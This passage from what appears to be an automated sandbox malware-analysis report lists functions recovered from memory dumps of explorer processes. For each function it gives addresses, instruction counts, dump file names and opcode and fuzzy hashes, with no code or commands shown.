                                                                          Function 00007FFD9B8804D0 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b29ed6e5d1b0947f7ce22ce79a3c8f3c9318c10e54e33f9869407e1d66a9a4b8
                                                                          • Instruction ID: 06830b3215d54ed3554cd53b5af0075b217c3e50948e0e85983eb7a7adf5f672
                                                                          • Opcode Fuzzy Hash: b29ed6e5d1b0947f7ce22ce79a3c8f3c9318c10e54e33f9869407e1d66a9a4b8
                                                                          • Instruction Fuzzy Hash: 2F31E621B18D484FE798FB2C986AA79A6C2EFDC705F0905BEE05EC32D7DE649C418341
                                                                          Function 00007FFD9B880949 Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7d6abe3c1591bb16099986c87093b7589fdc05cefd027523eaa3713064a27b6e
                                                                          • Instruction ID: 5263dbd456e51007274b8b16f93300e2e13176e724d34df04136f01fbcbf9431
                                                                          • Opcode Fuzzy Hash: 7d6abe3c1591bb16099986c87093b7589fdc05cefd027523eaa3713064a27b6e
                                                                          • Instruction Fuzzy Hash: 22319570B1890E8FDB48EBB89865AFE7BB1FF88300F500575D019D32C6DE38A9428751
                                                                          Function 00007FFD9B880A89 Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5efa6137fccaae6be491e78b99b366822d4d63ceb7968d368018f731797167a
                                                                          • Instruction ID: a5d900e5412a5c150af5e34c75cb05395fd1c64aec9c9194bc4af4206cf214d3
                                                                          • Opcode Fuzzy Hash: e5efa6137fccaae6be491e78b99b366822d4d63ceb7968d368018f731797167a
                                                                          • Instruction Fuzzy Hash: FC21A351B2DE4A4FE75977B85C29BB876D2EFA8740F0501BAE02CC32D7DD28A9414782
                                                                          Function 00007FFD9B881781 Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44b522c1eac8834ed6ec9139d56a2a5a3703d53f0f9aee3e706e2dbe2a73fa32
                                                                          • Instruction ID: e159134ddc098bcb37bb456e8bfcb2ca8b16f7f1b4a234d2772a424d3582fdda
                                                                          • Opcode Fuzzy Hash: 44b522c1eac8834ed6ec9139d56a2a5a3703d53f0f9aee3e706e2dbe2a73fa32
                                                                          • Instruction Fuzzy Hash: 69016B11B0EA994FE36073386864471BFE0CF8E220B0905BBE499C60EBDD295A854342
                                                                          Function 00007FFD9B880B68 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edf27a62abc4d3db22280f4b4c4b814dbb3b702da6d8e87b617715996ec4b4e8
                                                                          • Instruction ID: 94a75f9a018a7f3231f09be0f4f879250756d611cc7efc97d5ec897b3536bfeb
                                                                          • Opcode Fuzzy Hash: edf27a62abc4d3db22280f4b4c4b814dbb3b702da6d8e87b617715996ec4b4e8
                                                                          • Instruction Fuzzy Hash: D4E0ED61B1491D8FEF85BBACA8556FCA2D2EB9C211F1001B7D51DD329ADE2858428391

                                                                          Executed Functions

                                                                          Function 00007FFD9B890E69 Relevance: .6, Instructions: 637COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb287e2b07be2543ebb6add867ab2626ecc3a56fd020d5d99d3a2fe93126f94e
                                                                          • Instruction ID: ab93d1d0f2d7d6c60b312aa70bc984c358ca1a0cb4728086dbbc1017ea56c42f
                                                                          • Opcode Fuzzy Hash: bb287e2b07be2543ebb6add867ab2626ecc3a56fd020d5d99d3a2fe93126f94e
                                                                          • Instruction Fuzzy Hash: BA12C561B2DA4D4FEB98FB7898656B97BD2FF9C305F400579E01EC32D6DE28A8418341
                                                                          Function 00007FFD9B890BEE Relevance: .3, Instructions: 254COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c3d10ed1343d4f15dcdb69372c12891ec5fba9e1ebdbbf8231252d93e723d98f
                                                                          • Instruction ID: c2eeb85a09bf703815f969cb0b0647d10976a55a193220ffa085ff18ed96ee1f
                                                                          • Opcode Fuzzy Hash: c3d10ed1343d4f15dcdb69372c12891ec5fba9e1ebdbbf8231252d93e723d98f
                                                                          • Instruction Fuzzy Hash: 23714A21F1DA8E0FEB55A76C9C656B97FE2EF89610F0501BAD44DC31EBDD286C428381
                                                                          Function 00007FFD9B8915DD Relevance: .2, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 034a283776f5f072f44ba3d7d79be6773d05cd9920af6075001f453f46ed63ac
                                                                          • Instruction ID: 302445d61904d29d1515b0fd73cf325e7da8fef64eec8bef700507967a6c614c
                                                                          • Opcode Fuzzy Hash: 034a283776f5f072f44ba3d7d79be6773d05cd9920af6075001f453f46ed63ac
                                                                          • Instruction Fuzzy Hash: 1B513220B0E6C95FDB9AAB7C98346756FD1DF9A219B0800FBE08DC31E7DD185802C342
                                                                          Function 00007FFD9B8904D0 Relevance: .1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4c9dc6b7e0dae49190d4c67b99da5a6a54edcff2215f3e2ee39757074b87b25
                                                                          • Instruction ID: 2916aa24d074906d1453a5714d8e7dddced256aa6650bc606011c323002b626f
                                                                          • Opcode Fuzzy Hash: a4c9dc6b7e0dae49190d4c67b99da5a6a54edcff2215f3e2ee39757074b87b25
                                                                          • Instruction Fuzzy Hash: D131E621B1C9484FEB98FB6C986AA78A6C2EF9C745F0905BEE04EC32D7DD649C418341
                                                                          Function 00007FFD9B890949 Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7d296a18831571335e5f55092eca6d010cd88d0ccd562245d4d65296ce51431
                                                                          • Instruction ID: 5b0f1278590f7ef6f9f3132918b5448becbc26de2e65f00e23fffee919df4e80
                                                                          • Opcode Fuzzy Hash: b7d296a18831571335e5f55092eca6d010cd88d0ccd562245d4d65296ce51431
                                                                          • Instruction Fuzzy Hash: E3318170F1990E8FDB48EBA89865AFDBBA1FF88300F540579D019D32D6DE38A8428741
                                                                          Function 00007FFD9B890A89 Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 29060f3451bdc7649fa1cb89708fadc07786dc39e8bb781a0bf165b1db7ac627
                                                                          • Instruction ID: f62e9121b0b8fa15bebc8998ff477c578cb5bd107936ca2255cbd77fb4bc767f
                                                                          • Opcode Fuzzy Hash: 29060f3451bdc7649fa1cb89708fadc07786dc39e8bb781a0bf165b1db7ac627
                                                                          • Instruction Fuzzy Hash: 1C21B161B29A4A4BEB9877B858297B96AD2EF68700F0502BBE05CC32D7DD18A9414381
                                                                          Function 00007FFD9B891781 Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00898252836a9e9f9bb8b6844cadf6d94b3e4308aab20bf1c2f6f9055a3d377c
                                                                          • Instruction ID: 2f5e151f7cb0814ebae1cb1a9e89fe12702d34875636ee2b159308161e4f6dbb
                                                                          • Opcode Fuzzy Hash: 00898252836a9e9f9bb8b6844cadf6d94b3e4308aab20bf1c2f6f9055a3d377c
                                                                          • Instruction Fuzzy Hash: 05016B15B0E69A5FEB60732868644717FE0CF86221B0905BBE489C60E6DD045A858382
                                                                          Function 00007FFD9B890B68 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2491926843.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_7ffd9b890000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0dd553a15cd41bafae9605e21a396922d62b4eeb41988f192f8670a7130d697a
                                                                          • Instruction ID: 1202546df7d7ac3095771ce2e54fbe9c71a9c0cfc2f6aa8e3a638da39e95addc
                                                                          • Opcode Fuzzy Hash: 0dd553a15cd41bafae9605e21a396922d62b4eeb41988f192f8670a7130d697a
                                                                          • Instruction Fuzzy Hash: 57E06D21B1481D8FEF84BBACA8552FCA2D2EB8C211F1001B7D11DD329ADE2858428381